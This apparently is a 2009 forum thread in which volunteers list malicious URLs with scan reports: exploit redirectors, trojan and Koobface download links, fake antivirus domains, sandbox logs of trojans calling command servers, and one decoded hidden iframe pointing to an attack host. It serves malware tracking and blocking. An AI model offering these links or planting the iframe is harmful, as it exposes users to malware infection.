http://sales.mypaymentarea.com/MjAwMDAy_MA==_QkE0MjAxNEM5RTNCMjI3OEE2QkI=/YXZh/1
https://wisypay.net/purchase/?vendor=2&id=49eaa01f4444b
-
Redirects to exploits:
odmina.ru/?v=myid37&lid=1033
http://wepawet.iseclab.org/view.php?hash=2a8ea1f1e331a0826ca485ab9e3232e3&t=1240038315&type=js
Redirect to exploits:
mixbunch.cn/thread.html
http://wepawet.iseclab.org/view.php?hash=c6f531cec4db882e322b62f802e8c481&t=1240199423&type=js
Exploits/trojan:
sunmaiamibich.ru/pupu/in.php
http://wepawet.cs.ucsb.edu/view.php?hash=cea26289df93bc2a5fd52c0d8767305a&t=1240188628&type=js
Trojan:
tayforlive.ru/gh.exe
http://www.virustotal.com/analisis/4317e8d4fca9ab9bf03c9cb727e43037
Trojan:
feds-r-watching.us/load.php?id=0&spl=1.exedec
http://www.virustotal.com/analisis/8b1f9ae18260c2d50f447e34eef66e02
Redirect to rogue:
spyware-files.info/0/go.php?sid=2
spyware-file.info/0/go.php?sid=2
AV fraud:
http://loyalvideoz.com/scan/?id=260
-
Sites related to rogue application: Home Antivirus 2009
h-a-virus-2009.com
h-a-virus2009.com
h-anti-virus-2009.com
h-anti-virus2009.com
h-antivirus2009.com
h-avirus2009.com
ha-virus2009.com
hanti-virus2009.com
hantivirus2009.com
havirus2009.com
home-a-v-2009.com
home-a-virus-2009.com
home-anti-v2009.com
home-anti-virus-2009.com
home-anti-virus2009.com
home-antiv2009.com
home-antivirus2009.com
home-av-2009.com
home-av2009.com
home-avirus2009.com
homeanti-virus-2009.com
homeantiv2009.com
homeantivirus2009.com
homeav-2009.com
homeav2009.com
homeavirus-2009.com
homeavirus2009.com
-
Exploit/trojan:
yes-exploit.ru/include/spl.php
http://wepawet.cs.ucsb.edu/view.php?hash=a4e75eb21b28ff23ca48d8d41dad895c&t=1240269807&type=js
Trojan:
125.87.2.125/mt/load.php?id=1
http://www.virustotal.com/analisis/b973239d38eb93711e46ab7c8d7d8c60
-
coolwallpapers.statusinfotech.com/ppi/install.exe
http://virscan.org/report/6fcf3670f1e511be8925b19d176205dc.html 14/38
-
sb123.8800.org/files/6.log
http://virscan.org/report/40e37183b23ef501c8c163b35a101441.html 2/38
http://www.threatexpert.com/report.aspx?md5=09cf1539317a107b134595f404aafdb2
ipkipk.3322.org/ipk.exe
http://virscan.org/report/711955885ef09950a2dd07800447e45e.html 9/38
-
209.44.126.29
Redirects to exploits:
hxxp://individualpeople.biz/go.php?sid=1
Wepawet (http://wepawet.cs.ucsb.edu/view.php?hash=20ed2f4e9b82bc72da58403395eecc90&t=1240399179&type=js)
Exploits:
hxxp://individualpeople.biz/go.php?sid=6
Wepawet (http://wepawet.cs.ucsb.edu/view.php?hash=ba7be5413ac16dab6608f2373a32b615&t=1240196375&type=js)
PDF Exploits:
hxxp://209.44.126.30/unsecurity/pdf.php?id=19663
File name: 1.pdf
File size: 7324 bytes
MD5: be9a4f50c3fb024a170b9ec53dd712d4
VirusTotal (http://www.virustotal.com/analisis/9affe859e1ca7d88b7a21f542ede998d) - 15/40 (37.5%)
Trojan:
hxxp://209.44.126.30/unsecurity/load.php?id=19663
File name: load.exe
File size: 94208 bytes
MD5: 47c0c6c2ce07c291651070b03dd83d7f
VirusTotal: Trojan TDSS (http://www.virustotal.com/analisis/3124e314d118f381c25da0d51dab676a) - 29/40 (72.5%)
Anubis (http://anubis.iseclab.org/?action=result&task_id=172499a592cac0b249dde8fc2e3eed994)
From ANUBIS:1033 to 92.48.91.145:80 - [trafficstatic.net]
Request: GET /banner/crcmds/main
Response: 200 "OK"
.......
From ANUBIS:1053 to 72.233.114.126:80 - [statsanalist.cn]
Request: GET /?gd=KCo7MD8uPS4iPA==&affid=Xl4=&subid=GVxfWF0=&prov=Xw==&mode=cr&v=5
Response: 200 "OK"
Request: GET /?gd=ICQwJiE8Oy4jIw==&affid=Xl4=&subid=GVxfWF0=&prov=Xl9fXl8=&mode=cr&v=5
Response: 200 "OK"
-
xy1.gac4a.com/01/v.exe
http://www.virustotal.com/analisis/a441100772fc53ac9df07971ce444d7e 23/39
-
JS IFRAME
hxxp://counnter.cn/top100_00.js
Wepawet (http://wepawet.iseclab.org/view.php?hash=c52bd9668a5eee067b99975751391185&t=1240427410&type=js)
Exploits:
hxxp://counnter.cn/z/count.php?o=1
Wepawet (http://wepawet.cs.ucsb.edu/view.php?type=js&hash=d62dc864116e5643e88dc14b2b3b4a8e&t=1239864253)
Exploits:
hxxp://counnter.cn/z/exploits/x9.php?zenturi=1
hxxp://counnter.cn/z/exploits/x7b.php
Wepawet (http://wepawet.iseclab.org/view.php?hash=49757767a3408050c3f82314a919217c&t=1240428143&type=js)
Jsunpack (http://jsunpack.jeek.org/dec/go?url=counnter.cn_z_exploits_x7b.php)
Exploits (x15b.zip):
hxxp://counnter.cn/z/exploits/x15b.php
VirusTotal: Trojan (http://www.virustotal.com/analisis/735e8f07bf3a55fc8d0ba70ee71379f6) 33/40 (82.5%)
Trojan (getexe.exe):
hxxp://counnter.cn/z/getexe.exe?o=1&t=1239892730&i=2154770527&e=10
VirusTotal: Trojan (http://www.virustotal.com/analisis/34f3b96711f909d233f51ac7335f3fc3) - 15/40 (37.5%)
-
w.94saomm.com/js.js
redirects to
www.10555.com/tv/fs.htm
http://wepawet.cs.ucsb.edu/view.php?hash=5380b380d7481ff7234b4cc9af6609c0&t=1240429053&type=js
various exploits lead to
b.wuc9.com/ac.css
http://www.virustotal.com/analisis/a3fdd8fcaa34c553ea0f7864296c4628 23/40
-
hxxp://www.edfvc.com
Comes up with Mal/Obfjs-AE with Sophos
http://www.sophos.com/security/analyses/viruses-and-spyware/malobfjsae.html
Obfuscated JS resolves to:
<iframe src="hxxp://googl-analisys.com/adwds/words.php?U8jG" style="display:none"></iframe>
MysteryFCM: Encased iFrame HTML in BBCode "CODE" tags.
-
zbot:
zss5dfggd.com/exe/ue.exe
http://www.virustotal.com/analisis/d5ba440a4de0b771088cd4b3714dbfae
Trojan:
zss5dfggd.com/exe/9.exe
http://www.virustotal.com/analisis/cafeb16b4df77833b8b1218f2f30b3ea
Trojan:
zss5dfggd.com/exe/lich.exe
http://www.virustotal.com/analisis/dde89e65277fe2cab50bc054c4c1e499
Trojan:
zss5dfggd.com/exe/gld.exe
http://www.virustotal.com/analisis/c48f145c65c717fcf4b750ae2c7cdd89
Trojan:
zss5dfggd.com/exe/mp.exe
http://www.virustotal.com/analisis/862f2e619d840b98a6e359e2ddb84f24
Fake AV:
winpcdown9.com/pcdef.exe
http://www.virustotal.com/analisis/ad13d92e29f9521c6ae48760ea106ed9
and the payment site it uses:
billingpayment.net/pp/?id=
Fake online scan:
litetubevideoz.com/scan
and the trojan that is downloaded:
litetubevideoz.com/codec.exe
http://www.virustotal.com/analisis/7b25de92bab8faf17a0da0acd7464afb
trojan:
litetubevideoz.com/null/exe2/3913443.exe
http://www.virustotal.com/analisis/4ba420744c78124fe6c00a28045628ae
Fake online scan:
online-spyware-scan.net/online-scan.html?ewmid=226
-
from banner ads to fake av
perfect-banner.com/www/images/300x250_uof_2.swf?clickTARGET=_blank&clickTAG=http://perfect-banner.com/www/delivery/ck.php?oaparams=2__bannerid=250__zoneid=171__cb=c8b86ecece
http://wepawet.iseclab.org/view.php?hash=17501d47ade222cffa45fc0f2f7c84bc&type=swf
swf redirects to
enjoyspringtime.com/?cmpid=dologology
redirects to
crustat.com/ts/in.cgi?mfcdologology&se=oth&ur=1&HTTP_REFERER=enj-cmpid%3Ddologology
redirects to
pnfzetnax.net/pro/dologology/
redirects to
78.47.132.220/aff78.php?url=http://truconv.com/?a=125&s=4a78
redirects to
78.47.132.220/a82a/cr/adv/142/index.html
78.47.132.220/a82a/cr/srm_free_setup.exe
http://www.virustotal.com/de/analisis/07fe8c68d017097af9ec74ebb8cc1dc6 18/40
MD5...: 66c7e910330c631ba4515781f44e2788
-
Exploits/Pinch trojan:
indiasportnews.com/mt/in.php
http://wepawet.cs.ucsb.edu/view.php?hash=4bb0a47f5b7fefbf32bb501c2f314bc0&t=1240532359&type=js
Trojan:
crisiss.net/at.exe
http://www.virustotal.com/analisis/7fcd8acc15681586603bbb368a75fd54
Fake AV - pretty big one, 5.8MB
setup.malwareremovalbot.com/setup.exe
http://www.virustotal.com/analisis/cf5ed54f4ec27bc84aaa528f50dd750a
-
Redirects to trojan:
hxxp://zbesttds.com/in.cgi?3
hxxp://zbesttds.com/in.cgi?4
Wepawet (http://wepawet.iseclab.org/view.php?hash=8f02ba1f78de6938def093f3e1c0d3c1&t=1240567079&type=js)
hxxp://zbesttds.com/in.cgi?5
hxxp://400.myfilehostings.net/movie.html
Wepawet (http://wepawet.iseclab.org/view.php?hash=6f34c32530fef1bf4e158c4f8c03f0e5&t=1240568871&type=js)
hxxp://tafficbots.com/in.cgi?8
hxxp://tafficbots.com/in.cgi?9
Wepawet (http://wepawet.iseclab.org/view.php?hash=b94025b4f058045a56a43069a3e1bfed&t=1240569469&type=js)
Wepawet (http://wepawet.iseclab.org/view.php?hash=633582e4121c69b1958525add78f77de&t=1240569515&type=js)
Trojan:
hxxp://asusdisp.org/file/1931/2df8718075249dc35642f6b633751605/0424095121892881/1.gif
hxxp://asusdisp.org/file/1931/2df8718075249dc35642f6b633751605/0424095121892881/2.gif
hxxp://asusdisp.org/file/1931/2df8718075249dc35642f6b633751605/04241021678229191/1.gif
hxxp://asusdisp.org/file/1931/2df8718075249dc35642f6b633751605/04241021678229191/2.gif
hxxp://asusdisp.org/file/1931/2df8718075249dc35642f6b633751605/04241021678229191/3.gif
hxxp://asusdisp.org/file/1931/2df8718075249dc35642f6b633751605/04241021678229191/4.gif
hxxp://asusdisp.org/file/1931/2df8718075249dc35642f6b633751605/04241021678229191/6.gif
hxxp://asusdisp.org/file/1931/2df8718075249dc35642f6b633751605/04241021678229191/7.gif
hxxp://asusdisp.org/file/1931/2df8718075249dc35642f6b633751605/04241021678229191/8.gif
hxxp://asusdisp.org/file/1931/2df8718075249dc35642f6b633751605/04241021678229191/9.gif
hxxp://asusdisp.org/file/1931/2df8718075249dc35642f6b633751605/0424103022287492/1.gif
hxxp://asusdisp.org/file/1931/2df8718075249dc35642f6b633751605/04241031340125215/1.gif
hxxp://asusdisp.org/file/1931/2df8718075249dc35642f6b633751605/04241035734251381/1.gif
Size: 125440 bytes,
MD5: f4342703b051c0ea1c81f0330f10dc3f
VirusTotal (http://www.virustotal.com/analisis/acfa3c724c289794d4a89ba772b69811) - 30/40 (75%)
*****************
Redirects to google:
hxxp://zbesttds.com/in.cgi?11
hxxp://zbesttds.com/in.cgi?16
Wepawet (http://wepawet.iseclab.org/view.php?hash=332ec8368583bb2ce3be288e149dc3db&t=1240566551&type=js)
Wepawet (http://wepawet.iseclab.org/view.php?hash=af20a07cd051895441993908c11e13ec&t=1240566589&type=js)
*****************
Redirects to rogue: (dead since a few hours)
hxxp://zbesttds.com/in.cgi?14
Wepawet (http://wepawet.iseclab.org/view.php?hash=cba930c84e61fb44e0f5d20bc30c0e95&t=1240566362&type=js)
*****************
Redirects to rogue:
hxxp://hitmidpoint.com/?accs=809&tid=1
hxxp://staritquick.com/in.cgi?13&gai=csptop&gli=100&gff=cs_362527174&al=
Wepawet (http://wepawet.iseclab.org/view.php?hash=3d0150bd82c70819f998c387e76d1c2f&t=1240568055&type=js)
*****************
Redirects to fake codec page:
hxxp://delshiktds.com/in.cgi?3
hxxp://myhealtharea.cn/in.cgi?2
Fake codec page:
hxxp://xtube-download.freehostia.com/tube.htm
Wepawet (http://wepawet.iseclab.org/view.php?hash=d3567427faceb030997915bee804c0cf&t=1240565964&type=js)
*****************
Redirects to fake codec page:
hxxp://tafficbots.com/in.cgi?7
Wepawet (http://wepawet.iseclab.org/view.php?hash=6e22b57b654e6eeaa93887271fb84dc3&t=1240569461&type=js)
Fake codec page:
hxxp://megaporntubes09.com/xplaymovie.php?id=40011
Wepawet (http://wepawet.iseclab.org/view.php?hash=6e22b57b654e6eeaa93887271fb84dc3&t=1240569461&type=js)
Trojan:
hxxp://lll-softportal.com/softwarefortubeview.40011.exe
VirusTotal: Trojan (http://www.virustotal.com/analisis/d9a5fd9a4915b87759a0544e7b8f97d3) - 7/40 (17.5%)
*****************
Redirects to rogue:
hxxp://kernelseo.com/in.cgi?default&parameter=up-file+download&se=15557
Wepawet (http://wepawet.iseclab.org/view.php?hash=4f32a80ccc9f49057e5d1a596bf6b010&t=1240385217&type=js)
-
http://antivir-scan-pro-best.com/11041/3/
http://files.load-archive-av-pro.com/normal/setup_11041_3_1.exe
http://int.sysproreport1.com/stat.php?func=installrun&id=11041&landing=-1&lang=EN&sub=1&notstat=1
http://dl.super-top-scan-pro.com/get/?pin=11041&lnd=-1&type=main
http://files.get-fails-load-av.com/release/setup.exe
http://dl.scan-anti-spy-4free.com/get/?pin=0&lnd=-1&type=scanner
-
music24shop.net/2/in.php
http://wepawet.cs.ucsb.edu/view.php?hash=cbf9102477119497295d517be62e4053&t=1240651814&type=js
http://music24shop.net/2/pdf.php
http://www.virustotal.com/analisis/08f4c49651626507490afd80932f4f71 1/38
music24shop.net/2/load.php?id=6
http://www.virustotal.com/analisis/dd3c7093b2b0827d6ee987b83f015faa 7/40
-
Exploit/trojan:
wtopcompany.ru/cms/cache/readme.pdf
http://wepawet.iseclab.org/view.php?hash=3f1acb074a6e8c6b03da890c06e1c4db&t=1240555768&type=js
Fake AV scan:
tubeontvgl.com/scan/?id=262
what's downloaded from there:
uploadmoviez.com/codec.exe
http://www.virustotal.com/analisis/3a09d83950707cd8c0f4c23d913c0129
Same files on the same IP:
youngsters.ru/codec.exe
pc-codec-pack.com/codec.exe
suckitnow1.net/codec.exe
velzevuladmin.com/codec.exe
-
Rogue:
Snobelium.com
Diastolea.com
cussermono.com
-
Rogue:
Snobelium.com
Diastolea.com
cussermono.com
Look like templates for future fake AVs. There is no additional content other than the page itself.
-
Rogue:
Snobelium.com
Diastolea.com
cussermono.com
Look like templates for future fake AVs. There is no additional content other than the page itself.
Yeah, I noticed that.
Will have content in the future probably..
Seems like IRC bot/backdoor:
77.75.105.221/e-card/e-card.gif.exe
http://www.virustotal.com/analisis/335638c7877b9d21eabb7f5e12881fe9
-
For the fun of it...
hxxp://youarelucky.biz/SmartDownload.exe
http://www.virustotal.com/analisis/786657fbd9af08fef0cb1745bce68fa5
hxxp://200.122.168.229/dl/goldvipclub/TrackDownload.dll?DID=991392
http://www.virustotal.com/analisis/5d97aab77fba7ca6ab7ecf6728034a15
hxxp://200.122.168.229/dl/goldvipclub/
http://www.virustotal.com/analisis/aef4b913ccfbe8918e83a8ed48870ddd
-
This
http://neono.biz/myy/index.php
And this
http://tipojud.com/quq/1/loads.php?id=68
-
exploits:
hxxp://210.240.61.68/fish/GV14.htm
Wepawet (http://wepawet.iseclab.org/view.php?hash=3b005d98e244f3ac81a6f4e59c1ecb68&t=1240870109&type=js)
trojan:
hxxp://www.spps.hlc.edu.tw/fish/1.exe
VirusTotal (http://www.virustotal.com/analisis/6e8ce06db44695743a9fc41859394f50) - 17/40 (42.5%)
Anubis (http://anubis.iseclab.org/?action=result&task_id=10e108d39962a6ac4754702165f33b3e7)
-
'Greeting cards' (IRC bot/backdoor):
hxxp://greetings.3utilities.com/logs/greetings.exe
hxxp://66.83.239.226/E-Greetings.exe
-
Fake AV:
fullsecurityaction.com
Anytoplikedsite.com
yourpcshield.com
totalvirushield.com
myfirstsecurityscan.com
stopspyware.org
Exploit/trojan
78.47.132.221/l3/index.php
http://wepawet.cs.ucsb.edu/view.php?hash=6f5cdfe1c1aeb5cd68a034c3c2984dc8&t=1240889755&type=js
Seems like koobface
70.254.41.230/setup.exe
http://www.virustotal.com/analisis/9dfc0bc4f3e5ea13ae76859d939a8fd8
-
hxxp://verringo.cn/bmngr2/controller.php?action=bot&entity_list=
From the same IP:
hxxp://www.downloads-123.com/dyyhhj1g/3j2khf32/aap.exe
http://www.virustotal.com/analisis/85d89df7d1f11b6178ba112551a4c248
hxxp://downloads-123.com/guard.exe
http://www.virustotal.com/analisis/1e3f57b7808d6e154dcea62a6e53d2f0
Result: 1/40 (2.5%)
hxxp://91.207.61.12/stata/controller.php?action=bot&entity_list=
From the same IP:
hxxp://tomohappy.com/forum/data.php?id=500
hxxp://tomohappy.com/forum/data.php?id=5xx // where xx is whatever numeric value...
http://www.virustotal.com/analisis/97eb93b986035c20b613677ba6235136
Result: 13/40 (32.50%)
hxxp://goooodbill.cn/unig/load.php
http://www.virustotal.com/analisis/5b838bbb5899ae16758851bf33d7521c
Result: 15/40 (37.5%)
hxxp://myspyfiles.cn/qazwsx/index.php
Injection - redirects to the already listed rutraff.cn:
http://www.google.com/search?hl=en&q=myspyfiles.cn&btnG=Google+Search
hxxp://xcount.cc/ads/in.cgi?13
hxxp://weh8dnb.com/cp/index.php
hxxp://weh8dnb.com/cp/load.php
http://www.virustotal.com/analisis/143e40ce67aa7846b7a06ac080c6bb34
Result: 4/40 (10%)
-
sorwwwros.cn/life/t.php
sorwwwros.cn/life/fdoc.pdf
http://www.virustotal.com/analisis/7e2777e6031abc9c55597bd880ad2f25 6/40
MD5...: 9de067ace8636a8a788a3925533e9660
http://wepawet.cs.ucsb.edu/view.php?hash=9de067ace8636a8a788a3925533e9660&type=js
sorwwwros.cn/life/fdem.swf
http://www.virustotal.com/analisis/75ff201372b07627b2e00defa0739510 0/40
MD5...: c7c0f03b8a7fec6b163c501bcb4d8500
payload
sorwwwros.cn/life/l.php?b=4&s=PDF
http://www.virustotal.com/analisis/0b67d1b488abcb478155d20ec2708633 17/40
MD5...: 84909a9d6cdc7c50cfd9da181232df7a
-
The...usual suspects:
hxxp://rxtraffclicks.com/download/1/1000/5
http://www.virustotal.com/analisis/4e670f047ca735c1e65f8e8aa458ca1f
Result: 15/40 (37.5%)
hxxp://pornosbest.com/movies/movie1.wmv.exe
http://www.virustotal.com/analisis/64bb880feb8b31a351c2809dc8549dde
Result: 12/40 (30%)
====================
These ones are currently being injected into unsuspecting sites... for now, they all lead to (already listed) litevehiclemall.cn...
hxxp://betbigwager.cn/in.cgi?income61
hxxp://hotslotpot.cn/in.cgi?income65
hxxp://litecartop.cn/in.cgi?income70
hxxp://lotultimatebet.cn/in.cgi?income60
http://www.robtex.com/ip/213.163.91.93.html
http://www.bfk.de/bfk_dnslogger.html?query=213.163.91.93#result
And...
http://www.robtex.com/ip/213.182.197.23.html
http://www.bfk.de/bfk_dnslogger.html?query=213.182.197.23#result
Another one which is being injected...
hxxp://nyoflak.com/?click=3C5DCB
According to Wepawet, it also leads to "openstats.info":
http://wepawet.cs.ucsb.edu/view.php?hash=b8ace1842982cb47ee7a390120812436&t=1240920333&type=js
But someone didn't want to blacklist openstats.info a few days earlier when I had mentioned it... ;D ;)
Yet one more:
hxxp://nipkelo.net/?click=5A158BD
The story in short - with even more domains to be blocked etc etc...
http://blog.unmaskparasites.com/2009/04/15/malicious-income-iframes-from-cn-domains/
hxxp://simple-faq.cc/stat.js
hxxp://a-stone.biz/xZfmG3YK1/
hxxp://a-stone.biz/xZfmG3YK1/flash.php?id=1647&spl=14
hxxp://a-stone.biz/xZfmG3YK1/load.php?id=1647
http://www.virustotal.com/analisis/b9495d617e3535b2420d19e25ce1b57f
Result: 16/40 (40%)
Now, what I've found rather interesting... is what happens when querying a-stone.biz directly, via Wepawet... and without the simple-faq.cc referrer:
http://wepawet.cs.ucsb.edu/view.php?hash=5a514c44b04f33c1834083a2a05e1432&t=1240934612&type=js
Redirects
From
http://a-stone.biz/xZfmG3YK1/
To
http://grabberz.com
It's a small world out there... ;)
-
Another lameness which is being injected to sites out there...
hxxp://77.92.158.122/webmail/inc/web/index.php
hxxp://77.92.158.122/webmail/inc/web/include/two.pdf
http://www.virustotal.com/analisis/29e7ee82e1302ef9559db58b41527755
Result: 14/40 (35%)
hxxp://77.92.158.122/webmail/inc/ -> Open dir...
-
hxxp://betbigwager.cn/in.cgi?income
hxxp://hotslotpot.cn/in.cgi?income
hxxp://litecarfinestsite.cn/in.cgi?income
hxxp://litecartop.cn/in.cgi?income
hxxp://lotultimatebet.cn/in.cgi?income
-
http://nhgfngfdhngf.com/fff9999.php?aid=40012&uid=e0905079d41d8cd98f00b204e9800998ecf8427e&os=512
http://imageempires.com/perce/1e20a980a5c00739dd84315d884c4d49081fa0501bd2a074be995820802939a85eec2ff8a432377ec/64d050a1229/perce.jpg
http://sphericalart.com/item/be3049005510b7d9dd4431fdd86c2d79b80fa0a0bbd2e034ae4908f0f02989a86eccafc8e45297bea/c4a07021c2e/item.gif
http://imagesmonitor.com/werber/e4d08081926/216.jpg
http://em.pc-on-internet.com/eas?camp=22768&ty=ct&popt1=1220&popt2=DE
http://download.web-mediaplayer.com/Web-MediaPlayer_setup.php?grpid=2053&tag_id=717&nums=FFjwag.AAA&popt1=1220&popt2=DE
Rogues
http://pcantimalware.com/PCAntiMalwareScannerSetup.exe
http://pc-privacydefender.com/PCPrivacyDefenderScannerSetup.exe
http://totalsystemguard.com/page.php?id=44
http://totalvirushield.com/download.php?affid=00000
http://totalvirushield.com/install/ws.zip
http://pro-scanner-antivir-free.com/11041/3/
http://files.loads-antiviral-files.com/normal/setup_11041_3_1.exe
Fake codecs
http://kokc-softportal.com/softwarefortubeview.40006.exe
http://uploadsmovies.com/codec/106.exe
-
Trojan:
secure123.org/img/winagent.exe
http://www.virustotal.com/analisis/cae7efe27fcd81c66f8e050b937de712
Trojan:
neirrela92-ammi.cn/it021.exe
http://www.virustotal.com/analisis/4cd315b8b8cbcd96802332a6ba59d90d
Trojan:
fddporn.net/6007_1.exe
http://www.virustotal.com/analisis/e2cdbb3586041e93705d5e88a3d72d42
fake AV:
fddporn.com/av.26.0.exe
http://www.virustotal.com/analisis/7f7dccb45937295dd11c73a989330b61
the fake AV website:
antiwareprotect.com
the fake payment site:
https://secure.paysecureorder.com/order?agree=on&prodid=2&r=1.0&butt=
Exploit/trojan:
karavan.us/bon/index.php
http://wepawet.cs.ucsb.edu/view.php?hash=6b8c81232ad4b6589475d706c22a061a&t=1241050191&type=js
Exploit/trojan:
karavan.us/sng/cache/readme.pdf
http://wepawet.cs.ucsb.edu/view.php?hash=3738291a02aadc69a7c9ed9e692d9b67&t=1241050218&type=js
-
http://neono.biz/opi/index.php
http://neono.biz/opi/cache/readme.pdf
http://neono.biz/opi/cache/flash.swf
http://neono.biz/opi/load.php
http://neono.biz/myy/load.php
-
hxxp://egangoff.com/images/pdf.php
hxxp://egangoff.com/images/builder.php - Flash
-
hxxp://liora.co.za/images/
http://wepawet.cs.ucsb.edu/view.php?hash=6751dee94cb3088705b66504d435a934&t=1241108619&type=js
http://www.virustotal.com/analisis/506618b146220329eb6ac64c552d0aed
-
bitcoreguard.net
bitcoreguard.com
guardlab.com
guardav.com
coreguard2009.com
coreguard2009.biz
coreguard2009.net
coreguardlab2009.biz
coreguardlab2009.net
coreguardlab2009.com
guardlab2009.biz
guardlab2009.net
guardlab2009.com
http://coreguard2009.com/coreguardd.exe
http://guardlab2009.com/InstallerWF.exe
Another interesting site from this gang??
just4yourtranquillity.com
-
hxxp://bigbargin.cn/file1.exe
And that's what happens to lamers still using MicroJoiner in 2009... ;D
http://www.virustotal.com/analisis/2977518dd680ba0acde393f6e9d58a10
From a well-known net neighbourhood...
hxxp://downfilg.com/in.cgi?2&a=1.exe // where "1" can be substituted with whatever string you want...
hxxp://keygroundc.com/download/1%2Eexe
http://www.virustotal.com/analisis/00f4e6ad59857e5d9a0920052317a471
-
Little bit of this and a little bit of that
http://fast-scanner-av-pro.com/11041/3/
http://thefullvirusscan.com/download.php?affid=08073
http://kekc-softportal.com/softwarefortubeview.40012.exe
http://upd.pccleansolution.com/?proto=4&rc=UAMS-0001-8882-7773&v=99.3.3.1&abbr=WBASE&platform=nt&os_version=5.1.2600.2.0&ac=B10511E3-DB89-4D8F-9666-5A0BA1ED885F&appid=UAMS&em=&pcid=2561334094&sv=
ReturnCode: 0
Text:
ProductVersion: 99.3.3.351
File:MalwareDB3510.exe,3871295,684586667,http://dl.setforinfo.com/updates/83/153/MalwareDB3510.exe
File:vbpv.dat,10,-830365698,http://dl.setforinfo.com/updates/83/153/vbpv.dat
File:update.script,143,-1272521259,http://scripts.setforinfo.com/update_script.php?ids=285_287
-
hxxp://prodownloadmanager.com/install.php
-
http://www.bfk.de/bfk_dnslogger.html?query=195.2.253.41#result
traff.loadmore.eu is already in list...
traff.loadd.in is Virut-related:
http://www.threatexpert.com/report.aspx?md5=4586242be6d360f577725e1487c2d7cf
http://www.prevx.com/filenames/1076913952874868034-X1/KEYGEN_SPYHUNTER.SECURITY.SUITE.V3.7.19%5B.html
And regarding the other 2 domains there...
hxxp://fineles.yourfoxlink.net/download/1.exe // ...very well-detected, you can change "1" to whatever string you want...
http://www.virustotal.com/analisis/9739b2f5e6adee880d9b86687d2c7ba1
Result: 34/40 (85%)
hxxp://yourfoxlink.net/files/1.exe // ...you can change "1" to whatever string you want...
hxxp://www.virustotal.com/analisis/d113e8d8aae448d9ebe320b7f9c15696
Result: 10/40 (25%)
-
Trojans:
gertruweq.com/ee/gld.exe
http://www.virustotal.com/analisis/92dbc2bad00080a577cb17ecb7cfd7b2
gertruweq.com/ee/ret.exe
http://www.virustotal.com/analisis/9a8654be39f40883c05c6b44708596cd
gertruweq.com/ee/9.exe
http://www.virustotal.com/analisis/f3fc6085f437fb11591a79c2c1331e43
-
Exploit/trojan:
adul8tra.cn/forum/foxpdf.php
http://wepawet.iseclab.org/view.php?hash=fbc7708cc988b8a5709796f83197a905&t=1241158354&type=js
k1l3r.ru/Y/include/spl.php
http://wepawet.iseclab.org/view.php?hash=b673dbc9d832f66c67af103cb1dbf9e8&t=1240825850&type=js
-
hxxp://basesrv3.net/yes/load.php
VirusTotal: Trojan (http://www.virustotal.com/analisis/cba60d1c2b108f1e03a46518980a142d) - 21/38 (55.26%)
hxxp://ldj5.biz/fo/exe.php
VirusTotal: Trojan (http://www.virustotal.com/analisis/92b9ba7ab8d03b9f838879df541a8536) - 11/40 (27.50%)
------------
hxxp://pushtutempo.com/uniq3/loads.php?id=88
VirusTotal: Trojan (http://www.virustotal.com/analisis/7c4dfa5c1e6c4f4c30a76d1f511416d6) - 4/40 (10%)
ThreatExpert (http://www.threatexpert.com/report.aspx?md5=8fc9779acb3553505810fd40629b4695)
Anubis Report (http://anubis.iseclab.org/?action=result&task_id=1c4b733144334c6c411a26821be3fc633)
connect to:
hxxp://verringo.cn/bmngr2/controller.php?action=bot&entity_list=&uid=&first=1&guid=13441600&rnd=3862340
hxxp://verringo.cn/bmngr2/controller.php?action=report&guid=0&rnd=3862340&uid=&entity=1239797538:unique_start
-
dolchepopka.ru/ol/in.php
http://wepawet.cs.ucsb.edu/view.php?hash=c5e81e17c05c73c50ffd675d7932f33d&t=1241260417&type=js
http://dolchepopka.ru/1/load.php?id=6
http://www.virustotal.com/de/analisis/b788baee70eaf595b2e8fc726484f8cf 10/40
http://dolchepopka.ru/ol/load.php?id=3
http://www.virustotal.com/de/analisis/f95123d5cf3281012c6cc0766b381db1 4/40
-
redirects to exploits:
hxxp://tds4self.com/sutra/in.cgi?3
Wepawet (http://wepawet.iseclab.org/view.php?hash=8d08793a7fce9b0edc095c038b00967f&t=1241256659&type=js)
exploits:
hxxp://webcom-software.net/links/?
hxxp://monkey-squad.net/monkey/index.php
hxxp://monkey-squad.net/monkey/spl/pdf.pdf
hxxp://bronotak.cn/phpmyadmin/index.php?
hxxp://qwu11a.biz/cpanel/spl/pdf.pdf
Wepawet (http://wepawet.iseclab.org/view.php?hash=1458d4c43388d9b059dadc0c86416d39&t=1241256889&type=js)
Wepawet (http://wepawet.iseclab.org/view.php?hash=40c522b5d94eefbd36ef5a027cfe3509&t=1241256556&type=js)
Wepawet (http://wepawet.iseclab.org/view.php?hash=ccb26870cf566e7f980ee4a46fc441b8&t=1241256743&type=js)
Wepawet (http://wepawet.iseclab.org/view.php?hash=6a89a05b812e9f981f08e25a21329dca&t=1241261515&type=js)
Wepawet (http://wepawet.cs.ucsb.edu/view.php?type=js&hash=5a88a5c5fc9f1aa0ca88fbd1beeeba9f&t=1241250527)
trojan:
hxxp://monkey-squad.net/monkey/exe.php
hxxp://qwu11a.biz/cpanel/exe.php
VirusTotal (http://www.virustotal.com/analisis/d6d3c79457cce29c2ef3ac44822e59eb) - 27/40 (67.5%)
VirusTotal (http://www.virustotal.com/analisis/d3fb0f65eafb1142d7d22355914dd011) - 11/40 (27.5%)
-
Exploit/trojan:
carpena.co.uk/cmweb/print/pdf.php
http://wepawet.iseclab.org/view.php?hash=7e78a387e1c5eac47bd34922f4cef85f&t=1241336475&type=js
Koobface: (goes on and off all the time)
86.108.36.203/setup.exe
99.50.245.81/setup.exe
http://www.virustotal.com/analisis/bd22d575927bfbf1103713d8718c3a90
Redirects to exploits:
freak-vkontakte.biz
contain iframe to http://basesrv3.net/bin/in.php
which is on MDL
Wepawet gives "Invalid hostname" on this domain.
http://jsunpack.jeek.org/dec/go?url=freak-vkontakte.biz
-
koobface:
99.149.173.147/setup.exe
http://www.virustotal.com/analisis/600848442c7fed4e8727fc0bc4ee4963
Fake AV:
way4scan.info
-
Fake AV:
truepornmovies.com/scan/?id=259
truepornupload.com/codec.exe
http://www.virustotal.com/analisis/cf4edf2f5335aeb331a25c1267bfd36f
Koobface:
75.10.117.174/setup.exe
http://www.virustotal.com/analisis/a2b8e6c4944251f9fc6cf88c36865dd7
Trojan:
wc-zone.biz/root.exe
http://www.virustotal.com/analisis/6272b4bfc597e3de994ab200a91c0d44
Trojan:
lesbian-girlhard.com/ftp.exe
http://www.virustotal.com/analisis/4d51d8169ba9ad5d74189913c2f89c4b
